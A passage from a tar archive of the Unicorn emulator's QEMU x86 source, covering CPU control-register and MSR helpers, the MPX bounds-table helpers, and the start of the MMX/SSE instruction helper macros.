target_ulong t0) { cpu_svm_check_intercept_param(env, SVM_EXIT_WRITE_CR0 + reg, 0, GETPC()); switch (reg) { case 0: cpu_x86_update_cr0(env, (uint32_t)t0); break; case 3: cpu_x86_update_cr3(env, t0); break; case 4: cpu_x86_update_cr4(env, (uint32_t)t0); break; case 8: #if 0 if (!(env->hflags2 & HF2_VINTR_MASK)) { cpu_set_apic_tpr(env_archcpu(env)->apic_state, t0); } #endif env->v_tpr = t0 & 0x0f; break; default: env->cr[reg] = t0; break; } } void helper_lmsw(CPUX86State *env, target_ulong t0) { /* only 4 lower bits of CR0 are modified. PE cannot be set to zero if already set to one. */ t0 = (env->cr[0] & ~0xe) | (t0 & 0xf); helper_write_crN(env, 0, t0); } void helper_invlpg(CPUX86State *env, target_ulong addr) { X86CPU *cpu = env_archcpu(env); cpu_svm_check_intercept_param(env, SVM_EXIT_INVLPG, 0, GETPC()); tlb_flush_page(CPU(cpu), addr); } void helper_rdtsc(CPUX86State *env) { uint64_t val; if ((env->cr[4] & CR4_TSD_MASK) && ((env->hflags & HF_CPL_MASK) != 0)) { raise_exception_ra(env, EXCP0D_GPF, GETPC()); } cpu_svm_check_intercept_param(env, SVM_EXIT_RDTSC, 0, GETPC()); val = cpu_get_tsc(env) + env->tsc_offset; env->regs[R_EAX] = (uint32_t)(val); env->regs[R_EDX] = (uint32_t)(val >> 32); } void helper_rdtscp(CPUX86State *env) { helper_rdtsc(env); env->regs[R_ECX] = (uint32_t)(env->tsc_aux); } void helper_rdpmc(CPUX86State *env) { if ((env->cr[4] & CR4_PCE_MASK) && ((env->hflags & HF_CPL_MASK) != 0)) { raise_exception_ra(env, EXCP0D_GPF, GETPC()); } cpu_svm_check_intercept_param(env, SVM_EXIT_RDPMC, 0, GETPC()); /* currently unimplemented */ qemu_log_mask(LOG_UNIMP, "x86: unimplemented rdpmc\n"); raise_exception_err(env, EXCP06_ILLOP, 0); } void helper_wrmsr(CPUX86State *env) { uint64_t val; cpu_svm_check_intercept_param(env, SVM_EXIT_MSR, 1, GETPC()); val = ((uint32_t)env->regs[R_EAX]) | ((uint64_t)((uint32_t)env->regs[R_EDX]) << 32); switch ((uint32_t)env->regs[R_ECX]) { case MSR_IA32_SYSENTER_CS: env->sysenter_cs = val & 0xffff; break; case MSR_IA32_SYSENTER_ESP: env->sysenter_esp = val; break; case MSR_IA32_SYSENTER_EIP: env->sysenter_eip = val; break; case MSR_IA32_APICBASE: // cpu_set_apic_base(env_archcpu(env)->apic_state, val); break; case MSR_EFER: { uint64_t update_mask; update_mask = 0; if (env->features[FEAT_8000_0001_EDX] & CPUID_EXT2_SYSCALL) { update_mask |= MSR_EFER_SCE; } if (env->features[FEAT_8000_0001_EDX] & CPUID_EXT2_LM) { update_mask |= MSR_EFER_LME; } if (env->features[FEAT_8000_0001_EDX] & CPUID_EXT2_FFXSR) { update_mask |= MSR_EFER_FFXSR; } if (env->features[FEAT_8000_0001_EDX] & CPUID_EXT2_NX) { update_mask |= MSR_EFER_NXE; } if (env->features[FEAT_8000_0001_ECX] & CPUID_EXT3_SVM) { update_mask |= MSR_EFER_SVME; } if (env->features[FEAT_8000_0001_EDX] & CPUID_EXT2_FFXSR) { update_mask |= MSR_EFER_FFXSR; } cpu_load_efer(env, (env->efer & ~update_mask) | (val & update_mask)); } break; case MSR_STAR: env->star = val; break; case MSR_PAT: env->pat = val; break; case MSR_VM_HSAVE_PA: env->vm_hsave = val; break; #ifdef TARGET_X86_64 case MSR_LSTAR: env->lstar = val; break; case MSR_CSTAR: env->cstar = val; break; case MSR_FMASK: env->fmask = val; break; case MSR_FSBASE: env->segs[R_FS].base = val; break; case MSR_GSBASE: env->segs[R_GS].base = val; break; case MSR_KERNELGSBASE: env->kernelgsbase = val; break; #endif case MSR_MTRRphysBase(0): case MSR_MTRRphysBase(1): case MSR_MTRRphysBase(2): case MSR_MTRRphysBase(3): case MSR_MTRRphysBase(4): case MSR_MTRRphysBase(5): case MSR_MTRRphysBase(6): case MSR_MTRRphysBase(7): env->mtrr_var[((uint32_t)env->regs[R_ECX] - MSR_MTRRphysBase(0)) / 2].base = val; break; case MSR_MTRRphysMask(0): case MSR_MTRRphysMask(1): case MSR_MTRRphysMask(2): case MSR_MTRRphysMask(3): case MSR_MTRRphysMask(4): case MSR_MTRRphysMask(5): case MSR_MTRRphysMask(6): case MSR_MTRRphysMask(7): env->mtrr_var[((uint32_t)env->regs[R_ECX] - MSR_MTRRphysMask(0)) / 2].mask = val; break; case MSR_MTRRfix64K_00000: env->mtrr_fixed[(uint32_t)env->regs[R_ECX] - MSR_MTRRfix64K_00000] = val; break; case MSR_MTRRfix16K_80000: case MSR_MTRRfix16K_A0000: env->mtrr_fixed[(uint32_t)env->regs[R_ECX] - MSR_MTRRfix16K_80000 + 1] = val; break; case MSR_MTRRfix4K_C0000: case MSR_MTRRfix4K_C8000: case MSR_MTRRfix4K_D0000: case MSR_MTRRfix4K_D8000: case MSR_MTRRfix4K_E0000: case MSR_MTRRfix4K_E8000: case MSR_MTRRfix4K_F0000: case MSR_MTRRfix4K_F8000: env->mtrr_fixed[(uint32_t)env->regs[R_ECX] - MSR_MTRRfix4K_C0000 + 3] = val; break; case MSR_MTRRdefType: env->mtrr_deftype = val; break; case MSR_MCG_STATUS: env->mcg_status = val; break; case MSR_MCG_CTL: if ((env->mcg_cap & MCG_CTL_P) && (val == 0 || val == ~(uint64_t)0)) { env->mcg_ctl = val; } break; case MSR_TSC_AUX: env->tsc_aux = val; break; case MSR_IA32_MISC_ENABLE: env->msr_ia32_misc_enable = val; break; case MSR_IA32_BNDCFGS: /* FIXME: #GP if reserved bits are set. */ /* FIXME: Extend highest implemented bit of linear address. */ env->msr_bndcfgs = val; cpu_sync_bndcs_hflags(env); break; default: if ((uint32_t)env->regs[R_ECX] >= MSR_MC0_CTL && (uint32_t)env->regs[R_ECX] < MSR_MC0_CTL + (4 * env->mcg_cap & 0xff)) { uint32_t offset = (uint32_t)env->regs[R_ECX] - MSR_MC0_CTL; if ((offset & 0x3) != 0 || (val == 0 || val == ~(uint64_t)0)) { env->mce_banks[offset] = val; } break; } /* XXX: exception? */ break; } } void helper_rdmsr(CPUX86State *env) { X86CPU *x86_cpu = env_archcpu(env); uint64_t val; cpu_svm_check_intercept_param(env, SVM_EXIT_MSR, 0, GETPC()); switch ((uint32_t)env->regs[R_ECX]) { case MSR_IA32_SYSENTER_CS: val = env->sysenter_cs; break; case MSR_IA32_SYSENTER_ESP: val = env->sysenter_esp; break; case MSR_IA32_SYSENTER_EIP: val = env->sysenter_eip; break; case MSR_IA32_APICBASE: val = 0; // cpu_get_apic_base(env_archcpu(env)->apic_state); break; case MSR_EFER: val = env->efer; break; case MSR_STAR: val = env->star; break; case MSR_PAT: val = env->pat; break; case MSR_VM_HSAVE_PA: val = env->vm_hsave; break; case MSR_IA32_PERF_STATUS: /* tsc_increment_by_tick */ val = 1000ULL; /* CPU multiplier */ val |= (((uint64_t)4ULL) << 40); break; #ifdef TARGET_X86_64 case MSR_LSTAR: val = env->lstar; break; case MSR_CSTAR: val = env->cstar; break; case MSR_FMASK: val = env->fmask; break; case MSR_FSBASE: val = env->segs[R_FS].base; break; case MSR_GSBASE: val = env->segs[R_GS].base; break; case MSR_KERNELGSBASE: val = env->kernelgsbase; break; case MSR_TSC_AUX: val = env->tsc_aux; break; #endif case MSR_SMI_COUNT: val = env->msr_smi_count; break; case MSR_MTRRphysBase(0): case MSR_MTRRphysBase(1): case MSR_MTRRphysBase(2): case MSR_MTRRphysBase(3): case MSR_MTRRphysBase(4): case MSR_MTRRphysBase(5): case MSR_MTRRphysBase(6): case MSR_MTRRphysBase(7): val = env->mtrr_var[((uint32_t)env->regs[R_ECX] - MSR_MTRRphysBase(0)) / 2].base; break; case MSR_MTRRphysMask(0): case MSR_MTRRphysMask(1): case MSR_MTRRphysMask(2): case MSR_MTRRphysMask(3): case MSR_MTRRphysMask(4): case MSR_MTRRphysMask(5): case MSR_MTRRphysMask(6): case MSR_MTRRphysMask(7): val = env->mtrr_var[((uint32_t)env->regs[R_ECX] - MSR_MTRRphysMask(0)) / 2].mask; break; case MSR_MTRRfix64K_00000: val = env->mtrr_fixed[0]; break; case MSR_MTRRfix16K_80000: case MSR_MTRRfix16K_A0000: val = env->mtrr_fixed[(uint32_t)env->regs[R_ECX] - MSR_MTRRfix16K_80000 + 1]; break; case MSR_MTRRfix4K_C0000: case MSR_MTRRfix4K_C8000: case MSR_MTRRfix4K_D0000: case MSR_MTRRfix4K_D8000: case MSR_MTRRfix4K_E0000: case MSR_MTRRfix4K_E8000: case MSR_MTRRfix4K_F0000: case MSR_MTRRfix4K_F8000: val = env->mtrr_fixed[(uint32_t)env->regs[R_ECX] - MSR_MTRRfix4K_C0000 + 3]; break; case MSR_MTRRdefType: val = env->mtrr_deftype; break; case MSR_MTRRcap: if (env->features[FEAT_1_EDX] & CPUID_MTRR) { val = MSR_MTRRcap_VCNT | MSR_MTRRcap_FIXRANGE_SUPPORT | MSR_MTRRcap_WC_SUPPORTED; } else { /* XXX: exception? */ val = 0; } break; case MSR_MCG_CAP: val = env->mcg_cap; break; case MSR_MCG_CTL: if (env->mcg_cap & MCG_CTL_P) { val = env->mcg_ctl; } else { val = 0; } break; case MSR_MCG_STATUS: val = env->mcg_status; break; case MSR_IA32_MISC_ENABLE: val = env->msr_ia32_misc_enable; break; case MSR_IA32_BNDCFGS: val = env->msr_bndcfgs; break; case MSR_IA32_UCODE_REV: val = x86_cpu->ucode_rev; break; default: if ((uint32_t)env->regs[R_ECX] >= MSR_MC0_CTL && (uint32_t)env->regs[R_ECX] < MSR_MC0_CTL + (4 * env->mcg_cap & 0xff)) { uint32_t offset = (uint32_t)env->regs[R_ECX] - MSR_MC0_CTL; val = env->mce_banks[offset]; break; } /* XXX: exception? */ val = 0; break; } env->regs[R_EAX] = (uint32_t)(val); env->regs[R_EDX] = (uint32_t)(val >> 32); } static void do_pause(X86CPU *cpu) { CPUState *cs = CPU(cpu); /* Just let another CPU run. */ cs->exception_index = EXCP_INTERRUPT; cpu_loop_exit(cs); } static void do_hlt(X86CPU *cpu) { CPUState *cs = CPU(cpu); CPUX86State *env = &cpu->env; env->hflags &= ~HF_INHIBIT_IRQ_MASK; /* needed if sti is just before */ cs->halted = 1; cs->exception_index = EXCP_HLT; cpu_loop_exit(cs); } void helper_hlt(CPUX86State *env, int next_eip_addend) { X86CPU *cpu = env_archcpu(env); cpu_svm_check_intercept_param(env, SVM_EXIT_HLT, 0, GETPC()); env->eip += next_eip_addend; do_hlt(cpu); } void helper_monitor(CPUX86State *env, target_ulong ptr) { if ((uint32_t)env->regs[R_ECX] != 0) { raise_exception_ra(env, EXCP0D_GPF, GETPC()); } /* XXX: store address? */ cpu_svm_check_intercept_param(env, SVM_EXIT_MONITOR, 0, GETPC()); } void helper_mwait(CPUX86State *env, int next_eip_addend) { CPUState *cs = env_cpu(env); X86CPU *cpu = env_archcpu(env); if ((uint32_t)env->regs[R_ECX] != 0) { raise_exception_ra(env, EXCP0D_GPF, GETPC()); } cpu_svm_check_intercept_param(env, SVM_EXIT_MWAIT, 0, GETPC()); env->eip += next_eip_addend; /* XXX: not complete but not completely erroneous */ // if (cs->cpu_index != 0 || CPU_NEXT(cs) != NULL) { // TODO if (cs->cpu_index != 0) { // do_pause(cpu); } else { do_hlt(cpu); } } void helper_pause(CPUX86State *env, int next_eip_addend) { X86CPU *cpu = env_archcpu(env); cpu_svm_check_intercept_param(env, SVM_EXIT_PAUSE, 0, GETPC()); env->eip += next_eip_addend; do_pause(cpu); } void helper_debug(CPUX86State *env) { CPUState *cs = env_cpu(env); cs->exception_index = EXCP_DEBUG; cpu_loop_exit(cs); } uint64_t helper_rdpkru(CPUX86State *env, uint32_t ecx) { if ((env->cr[4] & CR4_PKE_MASK) == 0) { raise_exception_err_ra(env, EXCP06_ILLOP, 0, GETPC()); } if (ecx != 0) { raise_exception_err_ra(env, EXCP0D_GPF, 0, GETPC()); } return env->pkru; } void helper_wrpkru(CPUX86State *env, uint32_t ecx, uint64_t val) { CPUState *cs = env_cpu(env); if ((env->cr[4] & CR4_PKE_MASK) == 0) { raise_exception_err_ra(env, EXCP06_ILLOP, 0, GETPC()); } if (ecx != 0 || (val & 0xFFFFFFFF00000000ull)) { raise_exception_err_ra(env, EXCP0D_GPF, 0, GETPC()); } env->pkru = val; tlb_flush(cs); } �������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/i386/mpx_helper.c���������������������������������������������������������0000664�0000000�0000000�00000007330�14675241067�0020444�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * x86 MPX helpers * * Copyright (c) 2015 Red Hat, Inc. * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/helper-proto.h" #include "exec/cpu_ldst.h" #include "exec/exec-all.h" void helper_bndck(CPUX86State *env, uint32_t fail) { if (unlikely(fail)) { env->bndcs_regs.sts = 1; raise_exception_ra(env, EXCP05_BOUND, GETPC()); } } static uint64_t lookup_bte64(CPUX86State *env, uint64_t base, uintptr_t ra) { uint64_t bndcsr, bde, bt; if ((env->hflags & HF_CPL_MASK) == 3) { bndcsr = env->bndcs_regs.cfgu; } else { bndcsr = env->msr_bndcfgs; } bde = (extract64(base, 20, 28) << 3) + (extract64(bndcsr, 20, 44) << 12); bt = cpu_ldq_data_ra(env, bde, ra); if ((bt & 1) == 0) { env->bndcs_regs.sts = bde | 2; raise_exception_ra(env, EXCP05_BOUND, ra); } return (extract64(base, 3, 17) << 5) + (bt & ~7); } static uint32_t lookup_bte32(CPUX86State *env, uint32_t base, uintptr_t ra) { uint32_t bndcsr, bde, bt; if ((env->hflags & HF_CPL_MASK) == 3) { bndcsr = env->bndcs_regs.cfgu; } else { bndcsr = env->msr_bndcfgs; } bde = (extract32(base, 12, 20) << 2) + (bndcsr & TARGET_PAGE_MASK); bt = cpu_ldl_data_ra(env, bde, ra); if ((bt & 1) == 0) { env->bndcs_regs.sts = bde | 2; raise_exception_ra(env, EXCP05_BOUND, ra); } return (extract32(base, 2, 10) << 4) + (bt & ~3); } uint64_t helper_bndldx64(CPUX86State *env, target_ulong base, target_ulong ptr) { uintptr_t ra = GETPC(); uint64_t bte, lb, ub, pt; bte = lookup_bte64(env, base, ra); lb = cpu_ldq_data_ra(env, bte, ra); ub = cpu_ldq_data_ra(env, bte + 8, ra); pt = cpu_ldq_data_ra(env, bte + 16, ra); if (pt != ptr) { lb = ub = 0; } env->mmx_t0.MMX_Q(0) = ub; return lb; } uint64_t helper_bndldx32(CPUX86State *env, target_ulong base, target_ulong ptr) { uintptr_t ra = GETPC(); uint32_t bte, lb, ub, pt; bte = lookup_bte32(env, base, ra); lb = cpu_ldl_data_ra(env, bte, ra); ub = cpu_ldl_data_ra(env, bte + 4, ra); pt = cpu_ldl_data_ra(env, bte + 8, ra); if (pt != ptr) { lb = ub = 0; } return ((uint64_t)ub << 32) | lb; } void helper_bndstx64(CPUX86State *env, target_ulong base, target_ulong ptr, uint64_t lb, uint64_t ub) { uintptr_t ra = GETPC(); uint64_t bte; bte = lookup_bte64(env, base, ra); cpu_stq_data_ra(env, bte, lb, ra); cpu_stq_data_ra(env, bte + 8, ub, ra); cpu_stq_data_ra(env, bte + 16, ptr, ra); } void helper_bndstx32(CPUX86State *env, target_ulong base, target_ulong ptr, uint64_t lb, uint64_t ub) { uintptr_t ra = GETPC(); uint32_t bte; bte = lookup_bte32(env, base, ra); cpu_stl_data_ra(env, bte, lb, ra); cpu_stl_data_ra(env, bte + 4, ub, ra); cpu_stl_data_ra(env, bte + 8, ptr, ra); } void helper_bnd_jmp(CPUX86State *env) { if (!(env->hflags2 & HF2_MPX_PR_MASK)) { memset(env->bnd_regs, 0, sizeof(env->bnd_regs)); env->hflags &= ~HF_MPX_IU_MASK; } } ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/i386/ops_sse.h������������������������������������������������������������0000664�0000000�0000000�00000225207�14675241067�0017766�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * MMX/3DNow!/SSE/SSE2/SSE3/SSSE3/SSE4/PNI support * * Copyright (c) 2005 Fabrice Bellard * Copyright (c) 2008 Intel Corporation <andrew.zaborowski@intel.com> * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "crypto/aes.h" #if SHIFT == 0 #define Reg MMXReg #define XMM_ONLY(...) #define B(n) MMX_B(n) #define W(n) MMX_W(n) #define L(n) MMX_L(n) #define Q(n) MMX_Q(n) #define SUFFIX _mmx #else #define Reg ZMMReg #define XMM_ONLY(...) __VA_ARGS__ #define B(n) ZMM_B(n) #define W(n) ZMM_W(n) #define L(n) ZMM_L(n) #define Q(n) ZMM_Q(n) #define SUFFIX _xmm #endif void glue(helper_psrlw, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { int shift; if (s->Q(0) > 15) { d->Q(0) = 0; #if SHIFT == 1 d->Q(1) = 0; #endif } else { shift = s->B(0); d->W(0) >>= shift; d->W(1) >>= shift; d->W(2) >>= shift; d->W(3) >>= shift; #if SHIFT == 1 d->W(4) >>= shift; d->W(5) >>= shift; d->W(6) >>= shift; d->W(7) >>= shift; #endif } } void glue(helper_psraw, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { int shift; if (s->Q(0) > 15) { shift = 15; } else { shift = s->B(0); } d->W(0) = (int16_t)d->W(0) >> shift; d->W(1) = (int16_t)d->W(1) >> shift; d->W(2) = (int16_t)d->W(2) >> shift; d->W(3) = (int16_t)d->W(3) >> shift; #if SHIFT == 1 d->W(4) = (int16_t)d->W(4) >> shift; d->W(5) = (int16_t)d->W(5) >> shift; d->W(6) = (int16_t)d->W(6) >> shift; d->W(7) = (int16_t)d->W(7) >> shift; #endif } void glue(helper_psllw, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { int shift; if (s->Q(0) > 15) { d->Q(0) = 0; #if SHIFT == 1 d->Q(1) = 0; #endif } else { shift = s->B(0); d->W(0) <<= shift; d->W(1) <<= shift; d->W(2) <<= shift; d->W(3) <<= shift; #if SHIFT == 1 d->W(4) <<= shift; d->W(5) <<= shift; d->W(6) <<= shift; d->W(7) <<= shift; #endif } } void glue(helper_psrld, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { int shift; if (s->Q(0) > 31) { d->Q(0) = 0; #if SHIFT == 1 d->Q(1) = 0; #endif } else { shift = s->B(0); d->L(0) >>= shift; d->L(1) >>= shift; #if SHIFT == 1 d->L(2) >>= shift; d->L(3) >>= shift; #endif } } void glue(helper_psrad, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { int shift; if (s->Q(0) > 31) { shift = 31; } else { shift = s->B(0); } d->L(0) = (int32_t)d->L(0) >> shift; d->L(1) = (int32_t)d->L(1) >> shift; #if SHIFT == 1 d->L(2) = (int32_t)d->L(2) >> shift; d->L(3) = (int32_t)d->L(3) >> shift; #endif } void glue(helper_pslld, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { int shift; if (s->Q(0) > 31) { d->Q(0) = 0; #if SHIFT == 1 d->Q(1) = 0; #endif } else { shift = s->B(0); d->L(0) <<= shift; d->L(1) <<= shift; #if SHIFT == 1 d->L(2) <<= shift; d->L(3) <<= shift; #endif } } void glue(helper_psrlq, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { int shift; if (s->Q(0) > 63) { d->Q(0) = 0; #if SHIFT == 1 d->Q(1) = 0; #endif } else { shift = s->B(0); d->Q(0) >>= shift; #if SHIFT == 1 d->Q(1) >>= shift; #endif } } void glue(helper_psllq, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { int shift; if (s->Q(0) > 63) { d->Q(0) = 0; #if SHIFT == 1 d->Q(1) = 0; #endif } else { shift = s->B(0); d->Q(0) <<= shift; #if SHIFT == 1 d->Q(1) <<= shift; #endif } } #if SHIFT == 1 void glue(helper_psrldq, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { int shift, i; shift = s->L(0); if (shift > 16) { shift = 16; } for (i = 0; i < 16 - shift; i++) { d->B(i) = d->B(i + shift); } for (i = 16 - shift; i < 16; i++) { d->B(i) = 0; } } void glue(helper_pslldq, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { int shift, i; shift = s->L(0); if (shift > 16) { shift = 16; } for (i = 15; i >= shift; i--) { d->B(i) = d->B(i - shift); } for (i = 0; i < shift; i++) { d->B(i) = 0; } } #endif #define SSE_HELPER_B(name, F) \ void glue(name, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) \ { \ d->B(0) = F(d->B(0), s->B(0)); \ d->B(1) = F(d->B(1), s->B(1)); \ d->B(2) = F(d->B(2), s->B(2)); \ d->B(3) = F(d->B(3), s->B(3)); \ d->B(4) = F(d->B(4), s->B(4)); \ d->B(5) = F(d->B(5), s->B(5)); \ d->B(6) = F(d->B(6), s->B(6)); \ d->B(7) = F(d->B(7), s->B(7)); \ XMM_ONLY( \ d->B(8) = F(d->B(8), s->B(8)); \ d->B(9) = F(d->B(9), s->B(9)); \ d->B(10) = F(d->B(10), s->B(10)); \ d->B(11) = F(d->B(11), s->B(11)); \ d->B(12) = F(d->B(12), s->B(12)); \ d->B(13) = F(d->B(13), s->B(13)); \ d->B(14) = F(d->B(14), s->B(14)); \ d->B(15) = F(d->B(15), s->B(15)); \ ) \ } #define SSE_HELPER_W(name, F) \ void glue(name, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) \ { \ d->W(0) = F(d->W(0), s->W(0)); \ d->W(1) = F(d->W(1), s->W(1)); \ d->W(2) = F(d->W(2), s->W(2)); \ d->W(3) = F(d->W(3), s->W(3)); \ XMM_ONLY( \ d->W(4) = F(d->W(4), s->W(4)); \ d->W(5) = F(d->W(5), s->W(5)); \ d->W(6) = F(d->W(6), s->W(6)); \ d->W(7) = F(d->W(7), s->W(7)); \ ) \ } #define SSE_HELPER_L(name, F) \ void glue(name, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) \ { \ d->L(0) = F(d->L(0), s->L(0)); \ d->L(1) = F(d->L(1), s->L(1)); \ XMM_ONLY( \ d->L(2) = F(d->L(2), s->L(2)); \ d->L(3) = F(d->L(3), s->L(3)); \ ) \ } #define SSE_HELPER_Q(name, F) \ void glue(name, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) \ { \ d->Q(0) = F(d->Q(0), s->Q(0)); \ XMM_ONLY( \ d->Q(1) = F(d->Q(1), s->Q(1)); \ ) \ } #if SHIFT == 0 static inline int satub(int x) { if (x < 0) { return 0; } else if (x > 255) { return 255; } else { return x; } } static inline int satuw(int x) { if (x < 0) { return 0; } else if (x > 65535) { return 65535; } else { return x; } } static inline int satsb(int x) { if (x < -128) { return -128; } else if (x > 127) { return 127; } else { return x; } } static inline int satsw(int x) { if (x < -32768) { return -32768; } else if (x > 32767) { return 32767; } else { return x; } } #define FADD(a, b) ((a) + (b)) #define FADDUB(a, b) satub((a) + (b)) #define FADDUW(a, b) satuw((a) + (b)) #define FADDSB(a, b) satsb((int8_t)(a) + (int8_t)(b)) #define FADDSW(a, b) satsw((int16_t)(a) + (int16_t)(b)) #define FSUB(a, b) ((a) - (b)) #define FSUBUB(a, b) satub((a) - (b)) #define FSUBUW(a, b) satuw((a) - (b)) #define FSUBSB(a, b) satsb((int8_t)(a) - (int8_t)(b)) #define FSUBSW(a, b) satsw((int16_t)(a) - (int16_t)(b)) #define FMINUB(a, b) ((a) < (b)) ? (a) : (b) #define FMINSW(a, b) ((int16_t)(a) < (int16_t)(b)) ? (a) : (b) #define FMAXUB(a, b) ((a) > (b)) ? (a) : (b) #define FMAXSW(a, b) ((int16_t)(a) > (int16_t)(b)) ? (a) : (b) #define FAND(a, b) ((a) & (b)) #define FANDN(a, b) ((~(a)) & (b)) #define FOR(a, b) ((a) | (b)) #define FXOR(a, b) ((a) ^ (b)) #define FCMPGTB(a, b) ((int8_t)(a) > (int8_t)(b) ? -1 : 0) #define FCMPGTW(a, b) ((int16_t)(a) > (int16_t)(b) ? -1 : 0) #define FCMPGTL(a, b) ((int32_t)(a) > (int32_t)(b) ? -1 : 0) #define FCMPEQ(a, b) ((a) == (b) ? -1 : 0) #define FMULLW(a, b) ((a) * (b)) #define FMULHRW(a, b) (((int16_t)(a) * (int16_t)(b) + 0x8000) >> 16) #define FMULHUW(a, b) ((a) * (b) >> 16) #define FMULHW(a, b) ((int16_t)(a) * (int16_t)(b) >> 16) #define FAVG(a, b) (((a) + (b) + 1) >> 1) #endif SSE_HELPER_B(helper_paddb, FADD) SSE_HELPER_W(helper_paddw, FADD) SSE_HELPER_L(helper_paddl, FADD) SSE_HELPER_Q(helper_paddq, FADD) SSE_HELPER_B(helper_psubb, FSUB) SSE_HELPER_W(helper_psubw, FSUB) SSE_HELPER_L(helper_psubl, FSUB) SSE_HELPER_Q(helper_psubq, FSUB) SSE_HELPER_B(helper_paddusb, FADDUB) SSE_HELPER_B(helper_paddsb, FADDSB) SSE_HELPER_B(helper_psubusb, FSUBUB) SSE_HELPER_B(helper_psubsb, FSUBSB) SSE_HELPER_W(helper_paddusw, FADDUW) SSE_HELPER_W(helper_paddsw, FADDSW) SSE_HELPER_W(helper_psubusw, FSUBUW) SSE_HELPER_W(helper_psubsw, FSUBSW) SSE_HELPER_B(helper_pminub, FMINUB) SSE_HELPER_B(helper_pmaxub, FMAXUB) SSE_HELPER_W(helper_pminsw, FMINSW) SSE_HELPER_W(helper_pmaxsw, FMAXSW) SSE_HELPER_Q(helper_pand, FAND) SSE_HELPER_Q(helper_pandn, FANDN) SSE_HELPER_Q(helper_por, FOR) SSE_HELPER_Q(helper_pxor, FXOR) SSE_HELPER_B(helper_pcmpgtb, FCMPGTB) SSE_HELPER_W(helper_pcmpgtw, FCMPGTW) SSE_HELPER_L(helper_pcmpgtl, FCMPGTL) SSE_HELPER_B(helper_pcmpeqb, FCMPEQ) SSE_HELPER_W(helper_pcmpeqw, FCMPEQ) SSE_HELPER_L(helper_pcmpeql, FCMPEQ) SSE_HELPER_W(helper_pmullw, FMULLW) #if SHIFT == 0 SSE_HELPER_W(helper_pmulhrw, FMULHRW) #endif SSE_HELPER_W(helper_pmulhuw, FMULHUW) SSE_HELPER_W(helper_pmulhw, FMULHW) SSE_HELPER_B(helper_pavgb, FAVG) SSE_HELPER_W(helper_pavgw, FAVG) void glue(helper_pmuludq, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { d->Q(0) = (uint64_t)s->L(0) * (uint64_t)d->L(0); #if SHIFT == 1 d->Q(1) = (uint64_t)s->L(2) * (uint64_t)d->L(2); #endif } void glue(helper_pmaddwd, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { int i; for (i = 0; i < (2 << SHIFT); i++) { d->L(i) = (int16_t)s->W(2 * i) * (int16_t)d->W(2 * i) + (int16_t)s->W(2 * i + 1) * (int16_t)d->W(2 * i + 1); } } #if SHIFT == 0 static inline int abs1(int a) { if (a < 0) { return -a; } else { return a; } } #endif void glue(helper_psadbw, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) { unsigned int val; val = 0; val += abs1(d->B(0) - s->B(0)); val += abs1(d->B(1) - s->B(1)); val += abs1(d->B(2) - s->B(2)); val += abs1(d->B(3) - s->B(3)); val += abs1(d->B(4) - s->B(4)); val += abs1(d->B(5) - s->B(5)); val += abs1(d->B(6) - s->B(6)); val += abs1(d->B(7) - s->B(7)); d->Q(0) = val; #if SHIFT == 1 val = 0; val += abs1(d->B(8) - s->B(8)); val += abs1(d->B(9) - s->B(9)); val += abs1(d->B(10) - s->B(10)); val += abs1(d->B(11) - s->B(11)); val += abs1(d->B(12) - s->B(12)); val += abs1(d->B(13) - s->B(13)); val += abs1(d->B(14) - s->B(14)); val += abs1(d->B(15) - s->B(15)); d->Q(1) = val; #endif } void glue(helper_maskmov, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, target_ulong a0) { int i; for (i = 0; i < (8 << SHIFT); i++) { if (s->B(i) & 0x80) { cpu_stb_data_ra(env, a0 + i, d->B(i), GETPC()); } } } void glue(helper_movl_mm_T0, SUFFIX)(Reg *d, uint32_t val) { d->L(0) = val; d->L(1) = 0; #if SHIFT == 1 d->Q(1) = 0; #endif } #ifdef TARGET_X86_64 void glue(helper_movq_mm_T0, SUFFIX)(Reg *d, uint64_t val) { d->Q(0) = val; #if SHIFT == 1 d->Q(1) = 0; #endif } #endif #if SHIFT == 0 void glue(helper_pshufw, SUFFIX)(Reg *d, Reg *s, int order) { Reg r; r.W(0) = s->W(order & 3); r.W(1) = s->W((order >> 2) & 3); r.W(2) = s->W((order >> 4) & 3); r.W(3) = s->W((order >> 6) & 3); *d = r; } #else void 